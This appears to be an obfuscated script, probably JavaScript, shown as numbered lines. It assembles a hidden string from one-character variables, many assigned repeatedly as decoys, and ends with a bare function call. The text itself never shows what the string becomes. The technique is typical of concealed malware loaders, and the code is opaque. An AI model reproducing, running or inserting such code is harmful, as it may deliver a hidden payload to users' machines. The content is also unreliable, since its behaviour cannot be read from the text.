ygzoksh + qrlqb + smxtnv + dbdluvxxn + zbgfuja + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + winfhg + kjisgyz + vwgmjzlo + qjgmfvcu + iwedatboe + winfhg + ygzoksh + rbktsrbhk + igispruv + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + igispruv + sbszjfzf + ygzoksh + dbdluvxxn + sbszjfzf + vwgmjzlo + fnucaons + smxtnv + zbgfuja + edsnt + igispruv + nupmhi + lpjlp + jyxuzotq + winfhg + fnucaons + lkyfppw + qwdhxlhsg + edsnt + igispruv + lchfe + kjisgyz + pfhej + qrlqb + fnucaons + vwgmjzlo + pfhej + edsnt + winfhg + odjkdymh + qwdhxlhsg + lkyfppw + qozwbvlw + lchfe + odjkdymh + zbgfuja + edsnt + dbdluvxxn + winfhg + ygzoksh + rbktsrbhk + nupmhi + edsnt + dbdluvxxn + winfhg + ygzoksh + rbktsrbhk + nupmhi + edsnt + dbdluvxxn + winfhg + ygzoksh + rbktsrbhk + nupmhi + edsnt + lpjlp + zbgfuja + jyxuzotq + qrlqb + iwedatboe + fnucaons + igispruv + edsnt + vwgmjzlo + lkyfppw + ygzoksh + winfhg + rbktsrbhk + edsnt + vwgmjzlo + lkyfppw + ygzoksh + winfhg + rbktsrbhk + edsnt + bdtedewrq + pfhej + rbktsrbhk + qjgmfvcu + qozwbvlw + iwedatboe + qrlqb + lchfe + rbktsrbhk + edsnt + igispruv + sbszjfzf + ygzoksh + dbdluvxxn + sbszjfzf + vwgmjzlo + fnucaons + smxtnv + zbgfuja + edsnt + rbktsrbhk + bdtedewrq + jyxuzotq + nupmhi + jyxuzotq + fnucaons + winfhg + nupmhi + smxtnv + edsnt + rbktsrbhk + bdtedewrq + jyxuzotq + nupmhi + jyxuzotq + fnucaons + winfhg + nupmhi + smxtnv + edsnt + rbktsrbhk + bdtedewrq + jyxuzotq + nupmhi + jyxuzotq + fnucaons + winfhg + nupmhi + smxtnv + edsnt + zxfxct + igispruv + smxtnv + zbgfuja + gsmbtvq + igispruv + qozwbvlw + lpjlp + edsnt + lpjlp + dbdluvxxn + winfhg + rbktsrbhk + jyxuzotq + sbszjfzf + edsnt + rbktsrbhk + bdtedewrq + jyxuzotq + nupmhi + jyxuzotq + fnucaons + winfhg + nupmhi + smxtnv + edsnt + qozwbvlw + zxfxct + kjisgyz + gsmbtvq + smxtnv + edsnt + bdtedewrq + gsmbtvq + ygzoksh + qrlqb + smxtnv + dbdluvxxn + zbgfuja + edsnt + zxfxct + igispruv + smxtnv + zbgfuja + gsmbtvq + igispruv + qozwbvlw + lpjlp + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + rbktsrbhk + bdtedewrq + jyxuzotq + nupmhi + jyxuzotq + fnucaons + winfhg + nupmhi + smxtnv + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + lpjlp + dbdluvxxn + winfhg + rbktsrbhk + jyxuzotq + sbszjfzf + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + pfhej + lkyfppw + smxtnv + fnucaons + zxfxct + edsnt + smxtnv + lpjlp + lchfe + lkyfppw + jyxuzotq + edsnt + igispruv + nupmhi + lpjlp + jyxuzotq + winfhg + fnucaons + lkyfppw + qwdhxlhsg + edsnt + fnucaons + pfhej + lpjlp + jyxuzotq + nupmhi + kjisgyz + vwgmjzlo + lchfe + edsnt + fnucaons + pfhej + lpjlp + jyxuzotq + nupmhi + kjisgyz + vwgmjzlo + lchfe + oznheyuo + wcxvk + oznheyuo + winfhg + qozwbvlw + vwgmjzlo + zbgfuja + rbktsrbhk + pxdyztl + stowjsos ); |
|
2 | } | |
3 | wcxvk = "g"; | |
4 | wcxvk = "I"; | |
5 | wcxvk = "0"; | |
6 | nupmhi = "v"; | |
7 | nupmhi = "O"; | |
8 | nupmhi = "A"; | |
9 | nupmhi = "j"; | |
10 | kqxsrqag = "T"; | |
11 | kqxsrqag = "R"; | |
12 | kqxsrqag = "u"; | |
13 | kqxsrqag = "k"; | |
14 | kqxsrqag = "6"; | |
15 | msypzrpv = "E"; | |
16 | msypzrpv = "d"; | |
17 | msypzrpv = "Q"; | |
18 | msypzrpv = "&"; | |
19 | bdtedewrq = "N"; | |
20 | bdtedewrq = "i"; | |
21 | lkyfppw = "H"; | |
22 | lkyfppw = "l"; | |
23 | lkyfppw = "i"; | |
24 | lkyfppw = "c"; | |
25 | xgocm = "N"; | |
26 | xgocm = "."; | |
27 | hbmpxagw = "Z"; | |
28 | hbmpxagw = "["; | |
29 | eimjmvfjx = "2"; | |
30 | gsmbtvq = "x"; | |
31 | gsmbtvq = "G"; | |
32 | gsmbtvq = "r"; | |
33 | rotxzx = "N"; | |
34 | rotxzx = "B"; | |
35 | rotxzx = "n"; | |
36 | rotxzx = "V"; | |
37 | rotxzx = "W"; | |
38 | fzldtfheq = "h"; | |
39 | fzldtfheq = "@"; | |
40 | oznheyuo = "F"; | |
41 | oznheyuo = "B"; | |
42 | oznheyuo = "z"; | |
43 | oznheyuo = "z"; | |
44 | oznheyuo = ","; | |
45 | smxtnv = "q"; | |
46 | smxtnv = "G"; | |
47 | smxtnv = "H"; | |
48 | smxtnv = "v"; | |
49 | smxtnv = "x"; | |
50 | bgxpidug = "v"; | |
51 | bgxpidug = "V"; | |
52 | bgxpidug = "X"; | |
53 | bgxpidug = "Z"; | |
54 | bgxpidug = "/"; | |
55 | gvhmog = "j"; | |
56 | gvhmog = "p"; | |
57 | gvhmog = "I"; | |
58 | gvhmog = "8"; | |
59 | qlrvoles = "e"; | |
60 | qlrvoles = "Y"; | |
61 | qlrvoles = "1"; | |
62 | nvdguuj = "t"; | |
63 | nvdguuj = "X"; | |
64 | nvdguuj = "S"; | |
65 | lpjlp = "l"; | |
66 | lpjlp = "g"; | |
67 | stowjsos = "Q"; | |
68 | stowjsos = "p"; | |
69 | stowjsos = ";"; | |
70 | qyhpylvxs = "x"; | |
71 | qyhpylvxs = "s"; | |
72 | qyhpylvxs = "F"; | |
73 | qyhpylvxs = "\\"; | |
74 | pxdyztl = "q"; | |
75 | pxdyztl = "O"; | |
76 | pxdyztl = "j"; | |
77 | pxdyztl = ")"; | |
78 | edsnt = "+"; | |
79 | fnucaons = "i"; | |
80 | fnucaons = "a"; | |
81 | fnucaons = "u"; | |
82 | fnucaons = "S"; | |
83 | fnucaons = "v"; | |
84 | lchfe = "B"; | |
85 | lchfe = "J"; | |
86 | lchfe = "O"; | |
87 | lchfe = "o"; | |
88 | odjkdymh = "n"; | |
89 | rbktsrbhk = "f"; | |
90 | rbktsrbhk = "e"; | |
91 | irhbxps = "U"; | |
92 | irhbxps = "B"; | |
93 | irhbxps = "U"; | |
94 | irhbxps = "t"; | |
95 | irhbxps = "3"; | |
96 | gpfemy = "t"; | |
97 | gpfemy = "Z"; | |
98 | gpfemy = "4"; | |
99 | iwedatboe = "t"; | |
100 | pfhej = "K"; | |
101 | pfhej = "g"; | |
102 | pfhej = "J"; | |
103 | pfhej = "m"; | |
104 | pfhej = "w"; | |
105 | jyxuzotq = "S"; | |
106 | jyxuzotq = "w"; | |
107 | jyxuzotq = "f"; | |
108 | jyxuzotq = "T"; | |
109 | jyxuzotq = "m"; | |
110 | ufdymrltt = "T"; | |
111 | ufdymrltt = "C"; | |
112 | akzrx = "N"; | |
113 | akzrx = "e"; | |
114 | akzrx = "D"; | |
115 | akzrx = "D"; | |
116 | akzrx = "7"; | |
117 | vwgmjzlo = "O"; | |
118 | vwgmjzlo = "T"; | |
119 | vwgmjzlo = "m"; | |
120 | vwgmjzlo = "X"; | |
121 | vwgmjzlo = "l"; | |
122 | isetai = "b"; | |
123 | isetai = "a"; | |
124 | isetai = "L"; | |
125 | isetai = "O"; | |
126 | vhgrlbmcv = " "; | |
127 | dbdluvxxn = "p"; | |
128 | qwdhxlhsg = "z"; | |
129 | qwdhxlhsg = "a"; | |
130 | qwdhxlhsg = "w"; | |
131 | qwdhxlhsg = "u"; | |
132 | zbgfuja = "V"; | |
133 | zbgfuja = "v"; | |
134 | zbgfuja = "i"; | |
135 | zbgfuja = "s"; | |
136 | kjisgyz = "z"; | |
137 | qozwbvlw = "I"; | |
138 | qozwbvlw = "a"; | |
139 | sbszjfzf = "q"; | |
140 | sbszjfzf = "X"; | |
141 | sbszjfzf = "y"; | |
142 | lqsfs = "i"; | |
143 | lqsfs = "("; | |
144 | qjgmfvcu = "g"; | |
145 | qjgmfvcu = "I"; | |
146 | qjgmfvcu = "j"; | |
147 | qjgmfvcu = "G"; | |
148 | qjgmfvcu = "d"; | |
149 | qrlqb = "U"; | |
150 | qrlqb = "o"; | |
151 | qrlqb = "G"; | |
152 | qrlqb = "J"; | |
153 | qrlqb = "b"; | |
154 | zxfxct = "M"; | |
155 | zxfxct = "X"; | |
156 | zxfxct = "k"; | |
157 | winfhg = "f"; | |
158 | tcpbwcfzj = "I"; | |
159 | tcpbwcfzj = "t"; | |
160 | tcpbwcfzj = "C"; | |
161 | tcpbwcfzj = "]"; | |
162 | ygzoksh = "F"; | |
163 | ygzoksh = "R"; | |
164 | ygzoksh = "W"; | |
165 | ygzoksh = "h"; | |
166 | skknkdf = "S"; | |
167 | skknkdf = "d"; | |
168 | skknkdf = "C"; | |
169 | skknkdf = "g"; | |
170 | skknkdf = "9"; | |
171 | igispruv = "q"; | |
172 | vjcuinvfp ( ); |
|